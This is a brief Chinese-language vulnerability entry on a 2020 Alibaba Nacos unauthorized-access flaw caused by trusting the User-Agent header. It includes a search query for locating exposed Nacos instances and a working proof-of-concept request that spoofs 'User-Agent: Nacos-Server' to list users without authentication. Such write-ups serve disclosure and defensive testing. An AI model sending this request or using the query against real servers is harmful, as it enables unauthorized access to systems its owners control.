跳转至

Alibaba Nacos user 未授权访问漏洞

漏洞描述

2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。

漏洞影响

Alibaba Nacos

网络测绘

app="NACOS"

漏洞复现

登陆页面

img

验证POC

GET /nacos/v1/auth/users?pageNo=1&pageSize=9
User-Agent: Nacos-Server

img